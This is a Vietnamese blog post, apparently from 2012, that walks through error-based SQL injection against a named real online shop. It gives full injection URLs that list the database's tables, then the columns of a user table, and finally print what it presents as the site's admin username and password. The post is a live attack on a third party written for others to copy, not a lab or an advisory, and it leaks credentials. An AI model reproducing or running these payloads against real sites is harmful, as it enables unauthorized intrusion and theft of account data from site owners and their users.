SQL Injection 1

Vào www.google.com.vn đánh vào



chọn đại 1 site để hack nèo :
http://www.avenuearabella.com/shop/s...ucts.asp?cat=1 nhé


đầu tiên thêm dấu vào sau link trên ta được
http://www.avenuearabella.com/shop/shopdisplayproducts.asp?cat=1'

kết quả nè



hahahha vậy dính lỗi goài kekkeke

tiếp nèo

1. Thu thập cấu trúc dữ liệu :

Lấy Table đầu tiên nhé

thử bỏ dấu và thêm vào sau là



ta có link
http://www.avenuearabella.com/shop/s...)--sp_password

sặc ko có gì hết....

thui ko bỏ dấu nữa để đó thêm dòng trên vào luôn nhé

ta có
http://www.avenuearabella.com/shop/shopdisplayproducts.asp?cat=1'%20and%201=convert(i nt,(select%20top%201%20table_name%20from%20informa tion_schema.tables))--sp_password

kakkaak dính lỗi tiếp





thấy cái tui tô màuxanh đó ko ...đó là table đầu tiên của nó đó,Như vậy ta có table đầu tiên là quantitydiscounts

Lấy tiếp table thứ hai :

ta thêm



cái màu xanh đó đó là table đầu tiên ta kiếm được đó nha

ta có link :
http://www.avenuearabella.com/shop/shopdisplayproducts.asp?cat=1'and%201=convert(int, (select%20top%201%20table_name%20from%20informatio n_schema.tables%20where%20table_name%20not%20in%20 ('quantitydiscounts')))--sp_password

----thấy gì ko?---



aha vậy table thứ 2 là searchresults

làm y chang như trên thêm searchresults vào link có table đầu tiên à giữa 2 table có cách nhau bằng dấu nhé



ta có link:
http://www.avenuearabella.com/shop/shopdisplayproducts.asp?cat=1'and%201=convert(int, (select%20top%201%20table_name%20from%20informatio n_schema.tables%20where%20table_name%20not%20in%20 ('quantitydiscounts','searchresults')))--sp_password

cái gì nữa đây



à table thứ 3 là reviews đó mà

làm như table thứ 2 là thêm vào link trên và cách nhau bằng dấu nhé

ta có link tiếp
http://www.avenuearabella.com/shop/shopdisplayproducts.asp?cat=1'and%201=convert(int, (select%20top%201%20table_name%20from%20informatio n_schema.tables%20where%20table_name%20not%20in%20 ('quantitydiscounts','searchresults','reviews')))--sp_password

hmmmm





khỏi nói table thứ 4 là gì nhé shipmethods đó

cứ thế nhé thêm table thứ 4 này vào lin trên tiếp ta lại có
http://www.avenuearabella.com/shop/shopdisplayproducts.asp?cat=1'and%201=convert(int, (select%20top%201%20table_name%20from%20informatio n_schema.tables%20where%20table_name%20not%20in%20 ('quantitydiscounts','searchresults','reviews','sh ipmethods')))--sp_password

hix hix mệt quá



tblaccess à

làm tiếp ta lại có table tbllog nhé

tui khỏi post lỗi đi mệt quá để tìm table rồi post cho pà con thôi

làm như thế ta lại có table 'tbluser'

hmm nghi nghi.... hình như user là người dùng phải ko ta để coi user và pass nó có trong này ko ta

muốn coi trong table đó có gì ta xóa cái dòng table nãy giờ tìm ở trên nhưng đừng xóa dấu nhé cái thèng này khó hỉu ghê



thêm cái trên vào link của nó ,để ý cái chữ màu xanh nhé

ta có link
http://www.avenuearabella.com/shop/shopdisplayproducts.asp?cat=1'and%201=convert(int, (select%20top%201%20column_name%20from%20informati on_schema.columns%20where%20table_name=('tbluser') ))--sp_password



thấy gì ko 'fldauto' nhớ nhé

Như vậy ta có Column đầu tiên là 'fldauto'



Sau đó lấy tiếp column tiếp theo bằng where column_name not in



link:
http://www.avenuearabella.com/shop/shopdisplayproducts.asp?cat=1'and%201=convert(int, (select%20top%201%20column_name%20from%20informati on_schema.columns%20where%20table_name=('tbluser') %20and%20column_name%20not%20in%20('fldauto')))--sp_password

cái gì đây ::confused:



'fldusername' à tên người dùng thì phải......thêm cái này vào link giống như lấy table đó ,ta có :
http://www.avenuearabella.com/shop/shopdisplayproducts.asp?cat=1'and%201=convert(int, (select%20top%201%20column_name%20from%20informati on_schema.columns%20where%20table_name=('tbluser') %20and%20column_name%20not%20in%20('fldauto','fldu sername')))--sp_password

 kekkeke



fldpassword à  phần hấp dẫn đấy

thôi tới đây thôi user và pass nằm trong coloum này rồi ....

sao mà lấy user và pass đây ta

đừng lo......

xóa cái nãy giờ ta test ở link trên đi....thêm cái đó vào

3 cái màu xanh nhé

ta có gì nèo



Ơ rê ca tìm ra rồi phần tô xanh 'qwe45/pamarino'

thấy ko trong đó user nó là qwe45 và pass là pamarino hahhaha

About : megagame và bài viết __ SQL Injection 1

Bài viết SQL Injection 1 Được viết bởi tác giả megagame vào lúc Thứ Tư, 29 tháng 2, 2012.
Cảm ơn bạn đã tham quan Blog và ghé xem bài viết này

Nếu có vấn đề thắc mắc hoặc cần thảo luận, hãy comment cho chúng tôi ở phía dưới nhé

Thanks you!


 

0 nhận xét:

Đăng nhận xét